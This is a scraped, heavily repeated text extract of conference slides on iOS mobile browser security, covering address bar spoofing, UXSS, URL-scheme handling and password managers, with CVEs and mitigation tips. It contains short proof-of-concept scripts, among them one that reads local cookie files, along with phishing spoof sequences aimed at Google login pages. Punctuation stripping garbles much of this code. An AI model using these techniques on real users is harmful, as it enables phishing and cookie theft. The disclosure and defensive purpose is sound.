bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 19: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/19.jpg)
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 20: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/20.jpg)
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
bull Failed navigation
bull Loading loop
bull Lots of other methods (race conditions history hellip)
bull Most of them known for over 10 years (IE Netscape)
Address Bar Spoofing
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 21: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/21.jpg)
URL tracking desynchronization
bull Navigate to untracked content
bull Initiate navigation interrupt overwrite content
